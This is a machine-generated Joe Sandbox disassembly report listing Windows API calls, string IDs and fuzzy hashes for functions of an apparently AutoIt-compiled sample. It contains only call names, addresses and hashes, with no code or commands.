                                                    • Instruction Fuzzy Hash: A011AC71500605FFDB109FA4CC49BEEBBBAEF55316F104229E885A7250DB329908CB60
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00658B2A
                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 00658B31
                                                    • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00658B40
                                                    • CloseHandle.KERNEL32(00000004), ref: 00658B4B
                                                    • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00658B7A
                                                    • DestroyEnvironmentBlock.USERENV(00000000), ref: 00658B8E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                    • String ID:
                                                    • API String ID: 1413079979-0
                                                    • Opcode ID: 021ad615f3a458e190358c2ae3c50dc7c214d5cb09a03ea44995aed6680dc596
                                                    • Instruction ID: d78f84f3a164cb3c94d5b00c0733b12821f224444532c3a4ec95c1f42b272281
                                                    • Opcode Fuzzy Hash: 021ad615f3a458e190358c2ae3c50dc7c214d5cb09a03ea44995aed6680dc596
                                                    • Instruction Fuzzy Hash: 091159B2600209BFDF018FA4ED49FDA7BAEEF08305F145164FE04A2160C7768E64AB60
                                                    APIs
                                                      • Part of subcall function 006012F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0060134D
                                                      • Part of subcall function 006012F3: SelectObject.GDI32(?,00000000), ref: 0060135C
                                                      • Part of subcall function 006012F3: BeginPath.GDI32(?), ref: 00601373
                                                      • Part of subcall function 006012F3: SelectObject.GDI32(?,00000000), ref: 0060139C
                                                    • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0068C1C4
                                                    • LineTo.GDI32(00000000,00000003,?), ref: 0068C1D8
                                                    • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0068C1E6
                                                    • LineTo.GDI32(00000000,00000000,?), ref: 0068C1F6
                                                    • EndPath.GDI32(00000000), ref: 0068C206
                                                    • StrokePath.GDI32(00000000), ref: 0068C216
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                    • String ID:
                                                    • API String ID: 43455801-0
                                                    • Opcode ID: 609210bebda2f48795ed04ffb51f6a3f640901e9c9279bc5baa43d07fde4d96d
                                                    • Instruction ID: afeb01cdc3472f63e2d75d6fd4a49b797e806c5fad828cf560a22e7ff3d57ec2
                                                    • Opcode Fuzzy Hash: 609210bebda2f48795ed04ffb51f6a3f640901e9c9279bc5baa43d07fde4d96d
                                                    • Instruction Fuzzy Hash: 26111E7640010CBFDF119F94DC48EEA7FAEEB04354F048125B9188A1A1C7719E55DBA0
                                                    APIs
                                                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 006203D3
                                                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 006203DB
                                                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 006203E6
                                                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 006203F1
                                                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 006203F9
                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00620401
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Virtual
                                                    • String ID:
                                                    • API String ID: 4278518827-0
                                                    • Opcode ID: c8ce5e51924d6c0b2d98f57fdacc3e3a7c583f7c2996e29096ff11bfe3098502
                                                    • Instruction ID: 52b73b378a183050eee603c40363860a249c3615448359fcb5683e8554e6589a
                                                    • Opcode Fuzzy Hash: c8ce5e51924d6c0b2d98f57fdacc3e3a7c583f7c2996e29096ff11bfe3098502
                                                    • Instruction Fuzzy Hash: 02016CB09417597DE3008F5A8C85B52FFA8FF19354F00421BA15C87941C7F5A864CBE5
                                                    APIs
                                                    • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0066569B
                                                    • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 006656B1
                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 006656C0
                                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 006656CF
                                                    • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 006656D9
                                                    • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 006656E0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                    • String ID:
                                                    • API String ID: 839392675-0
                                                    • Opcode ID: e4ba6bdfb3aaa060c78c58e0fc4e4066b1ed364101e41a26d02267fc2ac9ecd4
                                                    • Instruction ID: f25b1162e98b2015251e12285870fc6feb9e212c046307c67f8e5c8c4125b781
                                                    • Opcode Fuzzy Hash: e4ba6bdfb3aaa060c78c58e0fc4e4066b1ed364101e41a26d02267fc2ac9ecd4
                                                    • Instruction Fuzzy Hash: 23F01D32241158BBE7215BA2DC0EEEB7A7DEFCAB11F000369FA05D1060EAA11A5187B5
                                                    APIs
                                                    • InterlockedExchange.KERNEL32(?,?), ref: 006674E5
                                                    • EnterCriticalSection.KERNEL32(?,?,00611044,?,?), ref: 006674F6
                                                    • TerminateThread.KERNEL32(00000000,000001F6,?,00611044,?,?), ref: 00667503
                                                    • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00611044,?,?), ref: 00667510
                                                      • Part of subcall function 00666ED7: CloseHandle.KERNEL32(00000000,?,0066751D,?,00611044,?,?), ref: 00666EE1
                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 00667523
                                                    • LeaveCriticalSection.KERNEL32(?,?,00611044,?,?), ref: 0066752A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                    • String ID:
                                                    • API String ID: 3495660284-0
                                                    APIs
                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00658E7F
                                                    • UnloadUserProfile.USERENV(?,?), ref: 00658E8B
                                                    • CloseHandle.KERNEL32(?), ref: 00658E94
                                                    • CloseHandle.KERNEL32(?), ref: 00658E9C
                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00658EA5
                                                    • HeapFree.KERNEL32(00000000), ref: 00658EAC
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                    • String ID:
                                                    • API String ID: 146765662-0
                                                    APIs
                                                    • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00692C7C,?), ref: 00657C32
                                                    • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00692C7C,?), ref: 00657C4A
                                                    • CLSIDFromProgID.OLE32(?,?,00000000,0068FB80,000000FF,?,00000000,00000800,00000000,?,00692C7C,?), ref: 00657C6F
                                                    • _memcmp.LIBCMT ref: 00657C90
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: FromProg$FreeTask_memcmp
                                                    • String ID: ,,i
                                                    • API String ID: 314563124-3276395716
                                                    APIs
                                                    • VariantInit.OLEAUT32(?), ref: 00678928
                                                    • CharUpperBuffW.USER32(?,?), ref: 00678A37
                                                    • VariantClear.OLEAUT32(?), ref: 00678BAF
                                                      • Part of subcall function 00667804: VariantInit.OLEAUT32(00000000), ref: 00667844
                                                      • Part of subcall function 00667804: VariantCopy.OLEAUT32(00000000,?), ref: 0066784D
                                                      • Part of subcall function 00667804: VariantClear.OLEAUT32(00000000), ref: 00667859
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                    • API String ID: 4237274167-1221869570
                                                    APIs
                                                      • Part of subcall function 0061FEC6: _wcscpy.LIBCMT ref: 0061FEE9
                                                    • _memset.LIBCMT ref: 00663077
                                                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 006630A6
                                                    • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00663159
                                                    • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00663187
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                    • String ID: 0
                                                    • API String ID: 4152858687-4108050209
                                                    APIs
                                                    • _memset.LIBCMT ref: 00662CAF
                                                    • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00662CCB
                                                    • DeleteMenu.USER32(?,00000007,00000000), ref: 00662D11
                                                    • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,006C6890,00000000), ref: 00662D5A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Menu$Delete$InfoItem_memset
                                                    • String ID: 0
                                                    • API String ID: 1173514356-4108050209
                                                    APIs
                                                    • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0067DAD9
                                                      • Part of subcall function 006079AB: _memmove.LIBCMT ref: 006079F9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: BuffCharLower_memmove
                                                    • String ID: cdecl$none$stdcall$winapi
                                                    • API String ID: 3425801089-567219261
                                                    APIs
                                                      • Part of subcall function 00607F41: _memmove.LIBCMT ref: 00607F82
                                                      • Part of subcall function 0065B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0065B0E7
                                                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 006593F6
                                                    • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00659409
                                                    • SendMessageW.USER32(?,00000189,?,00000000), ref: 00659439
                                                      • Part of subcall function 00607D2C: _memmove.LIBCMT ref: 00607D66
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$_memmove$ClassName
                                                    • String ID: ComboBox$ListBox
                                                    • API String ID: 365058703-1403004172
                                                    APIs
                                                    • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00671B40
                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00671B66
                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00671B96
                                                    • InternetCloseHandle.WININET(00000000), ref: 00671BDD
                                                      • Part of subcall function 00672777: GetLastError.KERNEL32(?,?,00671B0B,00000000,00000000,00000001), ref: 0067278C
                                                      • Part of subcall function 00672777: SetEvent.KERNEL32(?,?,00671B0B,00000000,00000000,00000001), ref: 006727A1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                    • String ID:
                                                    • API String ID: 3113390036-3916222277
                                                    APIs
                                                      • Part of subcall function 00601D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00601D73
                                                      • Part of subcall function 00601D35: GetStockObject.GDI32(00000011), ref: 00601D87
                                                      • Part of subcall function 00601D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00601D91
                                                    • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 006866D0
                                                    • LoadLibraryW.KERNEL32(?), ref: 006866D7
                                                    • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 006866EC
                                                    • DestroyWindow.USER32(?), ref: 006866F4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                    • String ID: SysAnimate32
                                                    • API String ID: 4146253029-1011021900
                                                    APIs
                                                    • GetStdHandle.KERNEL32(0000000C), ref: 0066705E
                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00667091
                                                    • GetStdHandle.KERNEL32(0000000C), ref: 006670A3
                                                    • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 006670DD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: CreateHandle$FilePipe
                                                    • String ID: nul
                                                    • API String ID: 4209266947-2873401336
                                                    APIs
                                                    • GetStdHandle.KERNEL32(000000F6), ref: 0066712B
                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0066715D
                                                    • GetStdHandle.KERNEL32(000000F6), ref: 0066716E
                                                    • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 006671A8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: CreateHandle$FilePipe
                                                    • String ID: nul
                                                    • API String ID: 4209266947-2873401336
                                                    • Opcode ID: 5edc7110ce0f37bf3719d3345dac4514a5834f5d41583d84e018965fcc34e687
                                                    • Instruction ID: cab91cceb311699dee2b32cf92ea1e5b244e11312d32726f35c4c5464b672b64
                                                    • Opcode Fuzzy Hash: 5edc7110ce0f37bf3719d3345dac4514a5834f5d41583d84e018965fcc34e687
                                                    • Instruction Fuzzy Hash: A921B375504205ABDB209F68DC04A9AF7EAAF56738F24071AFDB0D33D0D770A941CB50
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00000001), ref: 0066AEBF
                                                    • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0066AF13
                                                    • __swprintf.LIBCMT ref: 0066AF2C
                                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000,0068F910), ref: 0066AF6A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: ErrorMode$InformationVolume__swprintf
                                                    • String ID: %lu
                                                    • API String ID: 3164766367-685833217
                                                    • Opcode ID: 99ffc1cc48034fe1a717ca941fcf56cc782687152b8deb371c47da216068da94
                                                    • Instruction ID: e6cd6cea525c72d93236b0892139e985da0a7df2560f4e7123f2910902161add
                                                    • Opcode Fuzzy Hash: 99ffc1cc48034fe1a717ca941fcf56cc782687152b8deb371c47da216068da94
                                                    • Instruction Fuzzy Hash: 37217434600109AFCB50DFA5C985DAF77BAEF49704B004069F905EB252DB31EA45CB61
                                                    APIs
                                                      • Part of subcall function 00607D2C: _memmove.LIBCMT ref: 00607D66
                                                      • Part of subcall function 0065A37C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0065A399
                                                      • Part of subcall function 0065A37C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0065A3AC
                                                      • Part of subcall function 0065A37C: GetCurrentThreadId.KERNEL32 ref: 0065A3B3
                                                      • Part of subcall function 0065A37C: AttachThreadInput.USER32(00000000), ref: 0065A3BA
                                                    • GetFocus.USER32 ref: 0065A554
                                                      • Part of subcall function 0065A3C5: GetParent.USER32(?), ref: 0065A3D3
                                                    • GetClassNameW.USER32(?,?,00000100), ref: 0065A59D
                                                    • EnumChildWindows.USER32(?,0065A615), ref: 0065A5C5
                                                    • __swprintf.LIBCMT ref: 0065A5DF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                                    • String ID: %s%d
                                                    • API String ID: 1941087503-1110647743
                                                    • Opcode ID: 524c84bcfb892df0a88f632af11038c55f0eedcdf3997853a6449b3dcbb099bf
                                                    • Instruction ID: 5aac0426410c642ca19fe1fcde4fadffde506e7fef7b182caf3f871af6cb0bfc
                                                    • Opcode Fuzzy Hash: 524c84bcfb892df0a88f632af11038c55f0eedcdf3997853a6449b3dcbb099bf
                                                    • Instruction Fuzzy Hash: 1C11A571640209BBDF50BFA0DC85FEA377AAF48701F044279BD089A192DA7459498B79
                                                    APIs
                                                    • CharUpperBuffW.USER32(?,?), ref: 00662048
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: BuffCharUpper
                                                    • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                    • API String ID: 3964851224-769500911
                                                    • Opcode ID: b04dbbfb725d6fa447e318ed07e2e1522d6d8fb7289e32fb932dbabf8eb985db
                                                    • Instruction ID: 49ddc69140901d27426b97ac4375a2c8fdb367930e09d63d59c917381dfaa037
                                                    • Opcode Fuzzy Hash: b04dbbfb725d6fa447e318ed07e2e1522d6d8fb7289e32fb932dbabf8eb985db
                                                    • Instruction Fuzzy Hash: 72116D70D4051ADFCF40EFA8D8914EEB7B6FF15304B508968D855A7392EB326916CF50
                                                    APIs
                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0067EF1B
                                                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0067EF4B
                                                    • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0067F07E
                                                    • CloseHandle.KERNEL32(?), ref: 0067F0FF
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                    • String ID:
                                                    • API String ID: 2364364464-0
                                                    • Opcode ID: 04a871eb120d28f15b0452e2d8721b882e0a66985f5dfafc8af72b699b2923c1
                                                    • Instruction ID: 326b557a11e56c0a4f12d7953fe6f0d304f6c1584cd9d2adf467da3a6d23b7d7
                                                    • Opcode Fuzzy Hash: 04a871eb120d28f15b0452e2d8721b882e0a66985f5dfafc8af72b699b2923c1
                                                    • Instruction Fuzzy Hash: 79815C716407009FD764DF28C886F6BB7E6AF48720F14881DF9999B3D2DA71AC408B95
                                                    APIs
                                                      • Part of subcall function 00607F41: _memmove.LIBCMT ref: 00607F82
                                                      • Part of subcall function 006810A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00680038,?,?), ref: 006810BC
                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00680388
                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 006803C7
                                                    • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0068040E
                                                    • RegCloseKey.ADVAPI32(?,?), ref: 0068043A
                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00680447
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                    • String ID:
                                                    • API String ID: 3440857362-0
                                                    • Opcode ID: 9c6f8c601263fbdaa9a7448098a33a33a797215b56b6785e3d307c0b0f1eb2d1
                                                    • Instruction ID: 35f489e07e3efb1ef78168d38752f081c265e3e8ffa21334c5185aca163835be
                                                    • Opcode Fuzzy Hash: 9c6f8c601263fbdaa9a7448098a33a33a797215b56b6785e3d307c0b0f1eb2d1
                                                    • Instruction Fuzzy Hash: 65515D31248205AFD744EF54C891E6FB7EAFF88304F448A2DF595972A2DB30E909CB56
                                                    APIs
                                                    • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0066E88A
                                                    • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0066E8B3
                                                    • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0066E8F2
                                                      • Part of subcall function 00609997: __itow.LIBCMT ref: 006099C2
